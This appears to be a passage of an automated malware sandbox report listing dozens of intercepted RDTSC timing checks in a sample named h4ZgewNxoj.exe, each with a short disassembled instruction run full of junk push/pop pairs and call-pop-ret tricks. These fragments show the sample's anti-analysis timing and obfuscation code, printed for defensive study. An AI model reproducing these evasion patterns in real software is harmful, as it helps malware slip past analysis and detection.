Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: ADD10F second address: ADD113 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: ADD435 second address: ADD450 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FDFF9160A30h 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push edi 0x0000000f pop edi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: ADD450 second address: ADD45F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDFF8F7915Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AE0B1B second address: AE0B2A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDFF9160A2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AE0B2A second address: AE0B30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AE0B30 second address: AE0B34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AE0B34 second address: AE0B38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AE108E second address: AE1094 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AE122D second address: AE1261 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 jg 00007FDFF8F79156h 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 pushad 0x00000012 jmp 00007FDFF8F79166h 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FDFF8F7915Ah 0x0000001e rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AE80A4 second address: AE80B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jne 00007FDFF9160A26h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AE80B1 second address: AE80CC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDFF8F79162h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AE8328 second address: AE8340 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDFF9160A32h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AE8340 second address: AE835E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007FDFF8F79156h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b jne 00007FDFF8F79156h 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push ebx 0x00000015 push edx 0x00000016 ja 00007FDFF8F79156h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AE848D second address: AE84AC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007FDFF9160A2Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c jng 00007FDFF9160A26h 0x00000012 pushad 0x00000013 popad 0x00000014 pop edi 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AE84AC second address: AE84C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDFF8F79162h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AEADF8 second address: AEAE09 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDFF9160A2Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AEAE09 second address: AEAE3A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007FDFF8F79163h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007FDFF8F7915Fh 0x00000015 popad 0x00000016 push ebx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AEAE3A second address: AEAE72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jp 00007FDFF9160A2Ch 0x00000010 mov eax, dword ptr [eax] 0x00000012 pushad 0x00000013 push edi 0x00000014 jnp 00007FDFF9160A26h 0x0000001a pop edi 0x0000001b push ecx 0x0000001c pushad 0x0000001d popad 0x0000001e pop ecx 0x0000001f popad 0x00000020 mov dword ptr [esp+04h], eax 0x00000024 push eax 0x00000025 push edx 0x00000026 jg 00007FDFF9160A2Ch 0x0000002c rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AEB251 second address: AEB269 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FDFF8F79163h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AEB552 second address: AEB557 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AEB9B0 second address: AEB9BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AEB9BC second address: AEB9C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AEBB56 second address: AEBB60 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FDFF8F79156h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AEBC49 second address: AEBC4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AEBD8C second address: AEBD91 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AEBFEA second address: AEBFEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AEC42D second address: AEC435 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AEC435 second address: AEC4D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 popad 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push ecx 0x0000000e call 00007FDFF9160A28h 0x00000013 pop ecx 0x00000014 mov dword ptr [esp+04h], ecx 0x00000018 add dword ptr [esp+04h], 0000001Dh 0x00000020 inc ecx 0x00000021 push ecx 0x00000022 ret 0x00000023 pop ecx 0x00000024 ret 0x00000025 mov esi, 200CEFDCh 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push ebp 0x0000002f call 00007FDFF9160A28h 0x00000034 pop ebp 0x00000035 mov dword ptr [esp+04h], ebp 0x00000039 add dword ptr [esp+04h], 00000019h 0x00000041 inc ebp 0x00000042 push ebp 0x00000043 ret 0x00000044 pop ebp 0x00000045 ret 0x00000046 jmp 00007FDFF9160A39h 0x0000004b mov si, di 0x0000004e push 00000000h 0x00000050 push ebx 0x00000051 mov dword ptr [ebp+122D17F8h], ecx 0x00000057 pop edi 0x00000058 push eax 0x00000059 pushad 0x0000005a jmp 00007FDFF9160A2Ch 0x0000005f push eax 0x00000060 push edx 0x00000061 jmp 00007FDFF9160A2Dh 0x00000066 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AECF03 second address: AECF21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDFF8F79165h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AED675 second address: AED679 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AED679 second address: AED687 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDFF8F7915Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AEE8A6 second address: AEE90B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 jng 00007FDFF9160A35h 0x0000000c jmp 00007FDFF9160A2Fh 0x00000011 nop 0x00000012 js 00007FDFF9160A2Ch 0x00000018 mov edi, dword ptr [ebp+122D1971h] 0x0000001e push 00000000h 0x00000020 push 00000000h 0x00000022 push ebx 0x00000023 call 00007FDFF9160A28h 0x00000028 pop ebx 0x00000029 mov dword ptr [esp+04h], ebx 0x0000002d add dword ptr [esp+04h], 00000015h 0x00000035 inc ebx 0x00000036 push ebx 0x00000037 ret 0x00000038 pop ebx 0x00000039 ret 0x0000003a mov edi, dword ptr [ebp+122D36C6h] 0x00000040 push 00000000h 0x00000042 jg 00007FDFF9160A2Ch 0x00000048 xchg eax, ebx 0x00000049 jp 00007FDFF9160A2Eh 0x0000004f push esi 0x00000050 push eax 0x00000051 push edx 0x00000052 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AED687 second address: AED6BC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007FDFF8F7915Ch 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push edi 0x00000011 pop edi 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FDFF8F79169h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AEE62E second address: AEE634 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AED6BC second address: AED6C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AEF20A second address: AEF20F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AF15C3 second address: AF15C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AF15C9 second address: AF1646 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 mov si, 597Ah 0x0000000a push 00000000h 0x0000000c push 00000000h 0x0000000e push ebx 0x0000000f call 00007FDFF9160A28h 0x00000014 pop ebx 0x00000015 mov dword ptr [esp+04h], ebx 0x00000019 add dword ptr [esp+04h], 0000001Bh 0x00000021 inc ebx 0x00000022 push ebx 0x00000023 ret 0x00000024 pop ebx 0x00000025 ret 0x00000026 mov dword ptr [ebp+122D3471h], edx 0x0000002c mov si, 43A1h 0x00000030 add dword ptr [ebp+1244C168h], eax 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push ebx 0x0000003b call 00007FDFF9160A28h 0x00000040 pop ebx 0x00000041 mov dword ptr [esp+04h], ebx 0x00000045 add dword ptr [esp+04h], 0000001Bh 0x0000004d inc ebx 0x0000004e push ebx 0x0000004f ret 0x00000050 pop ebx 0x00000051 ret 0x00000052 mov dword ptr [ebp+122D17DCh], esi 0x00000058 push eax 0x00000059 push eax 0x0000005a push edx 0x0000005b jmp 00007FDFF9160A30h 0x00000060 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AF44BA second address: AF44C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FDFF8F79156h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AF44C5 second address: AF44CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AF44CB second address: AF4509 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edi 0x0000000a push eax 0x0000000b jnc 00007FDFF8F79156h 0x00000011 pop eax 0x00000012 pop edi 0x00000013 nop 0x00000014 mov bh, 02h 0x00000016 push 00000000h 0x00000018 or bx, 12FBh 0x0000001d push 00000000h 0x0000001f jmp 00007FDFF8F79161h 0x00000024 mov bx, si 0x00000027 xchg eax, esi 0x00000028 jl 00007FDFF8F79160h 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AF4509 second address: AF4521 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FDFF9160A2Dh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AF4521 second address: AF4525 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AF4525 second address: AF452B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AF06DF second address: AF06E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AF06E3 second address: AF0711 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDFF9160A2Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c pop edx 0x0000000d popad 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FDFF9160A36h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AF64C7 second address: AF6501 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov dword ptr [esp], eax 0x0000000a mov edi, 2C6FE4B2h 0x0000000f push 00000000h 0x00000011 mov edi, dword ptr [ebp+122D3200h] 0x00000017 push 00000000h 0x00000019 call 00007FDFF8F79162h 0x0000001e pop edi 0x0000001f push eax 0x00000020 pushad 0x00000021 je 00007FDFF8F79158h 0x00000027 push edx 0x00000028 pop edx 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AF0711 second address: AF071B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FDFF9160A26h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AF7498 second address: AF74A2 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FDFF8F7915Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AF74A2 second address: AF74D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b mov ebx, dword ptr [ebp+122D1919h] 0x00000011 jmp 00007FDFF9160A36h 0x00000016 push 00000000h 0x00000018 mov bh, DDh 0x0000001a push eax 0x0000001b push eax 0x0000001c push edx 0x0000001d jl 00007FDFF9160A2Ch 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AF74D8 second address: AF74DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AF86BF second address: AF86C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AFB70D second address: AFB711 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AFB711 second address: AFB72B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FDFF9160A2Eh 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AFB72B second address: AFB731 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AADB53 second address: AADB57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AADB57 second address: AADB5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AFDD84 second address: AFDDBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 mov dword ptr [esp], eax 0x00000008 mov di, 2A33h 0x0000000c push 00000000h 0x0000000e jmp 00007FDFF9160A2Eh 0x00000013 sub dword ptr [ebp+124621C3h], edi 0x00000019 push 00000000h 0x0000001b jc 00007FDFF9160A2Bh 0x00000021 mov ebx, 5C21BAA6h 0x00000026 push eax 0x00000027 jbe 00007FDFF9160A34h 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AFDDBE second address: AFDDC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AF5690 second address: AF5694 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AF5694 second address: AF56C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FDFF8F79169h 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 js 00007FDFF8F79156h 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AFED2D second address: AFED33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AF56C1 second address: AF56DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDFF8F79166h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AFED33 second address: AFED38 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AF56DB second address: AF56DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AFED38 second address: AFED79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 jp 00007FDFF9160A2Eh 0x0000000e push 00000000h 0x00000010 clc 0x00000011 mov dword ptr [ebp+122D288Eh], esi 0x00000017 push 00000000h 0x00000019 mov di, 7860h 0x0000001d push eax 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FDFF9160A39h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AF6642 second address: AF6646 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AF6646 second address: AF664A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AF881F second address: AF8823 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AF8823 second address: AF8856 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007FDFF9160A37h 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FDFF9160A32h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AF9868 second address: AF986C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AF986C second address: AF9876 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FDFF9160A26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AF9876 second address: AF9880 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FDFF8F79156h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AF9880 second address: AF9884 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B069D3 second address: B069D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B069D7 second address: B069DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B0C85D second address: B0C88E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDFF8F79164h 0x00000009 push esi 0x0000000a jmp 00007FDFF8F79162h 0x0000000f pushad 0x00000010 popad 0x00000011 pop esi 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B0CA0E second address: B0CA34 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDFF9160A38h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jc 00007FDFF9160A32h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B0CB70 second address: B0CB8E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FDFF8F79169h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B0CB8E second address: B0CB94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B0CB94 second address: B0CBBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FDFF8F79169h 0x0000000c jns 00007FDFF8F79156h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B0CBBA second address: B0CBBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B130E2 second address: B130E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B13267 second address: B13279 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDFF9160A2Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
